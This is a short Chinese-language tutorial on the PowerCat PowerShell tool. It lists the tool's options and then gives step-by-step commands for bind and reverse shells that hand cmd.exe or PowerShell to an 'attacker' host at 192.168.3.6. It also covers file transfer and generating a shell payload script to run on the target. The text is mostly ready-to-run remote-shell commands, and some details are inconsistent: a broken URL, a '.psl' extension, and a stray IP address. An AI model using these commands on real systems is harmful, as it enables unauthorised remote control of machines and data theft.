隧道技术-Powercat

PowerCat：

1.下载地址：https://github/besimorhino/powercat

2.下载下来导入

Import-Module .\powercat.psl

3.如果提示未能加载指定模块，则可能是权限问题，输入如下代码

Set-ExecutionPolicy Unrestricted

4.输入如下明林克查看帮助信息

powercat -h

5.出现如下界面则安装成功：

 

 

PowerCat常用命令：

-l 监听模式　　-c连接到侦听器　　-p要连接或监听的端口　　-e执行　　-ep执行Powershell　　-r中继。格式"-r tcp: 10.1.1.1:443"

-u通过UDP传输数据　　-dns通过dns传输数据　　-dnsftNDS故障阀值　　-t超时选项。默认：60　　-I输入：文件路径，字节数组或字符串　

-o控制台输出类型：''主机'',''字节'',''字符串''　　-of输出文件路径　　-d连接后断开连接　　-rep中继器。断开连接后重启

-g生成有效载荷　　-ge生成编码有效载荷　　-h打印帮助信息

 

断开规则：连接断先断

攻击机：192.168.3.6 目标靶机：192.168.3.10

nc和PowerCat正向连接：

第一步：靶机使用powercat执行：powercat -l -p 8080 -e cmd.exe -v

第二步：攻击机使用nc执行：nc 192.168.3.10 8080 -vv

Powercat和nc反向连接：

第一步：靶机使用powercat执行：powercat -c 192.168.3.6 -p 8888 -v -e cmd.exe

第二步：攻击机使用nc执行：nc -l -p 8888 -vv

Powercat和powercat正向连接：

第一步：靶机使用powercat执行：powercat -c 192.168.3.6 -p 9999 -v -ep

第二步：攻击机使用powercat -l -p 9999 -v

Powercat和powercat反向连接：

第一步：靶机使用powercat执行：powercat -c 192.168.3.6 -p 9999 -v -er

第二步：攻击机使用powercat执行：powercat -l -p 9999 -v

Powercat文件传输：

第一步：靶机使用powercat执行：powercat -l -p 9999 -of test.txt -v

第二步：powercat -c 192.168.3.10 -p 9999 -i D:\路径 -v

 

Powercat生成payload：

第一步：攻击机使用powercat生成payload命令：

　　payload powercat -l -p 8000 -e cmd -v -g >> shell.psl

第二步：攻击机使用powercat执行：

　　powercat -c 192.168.41.133 -p 8000 -v

第三步：在靶机上运行脚本

　　.\shell.psl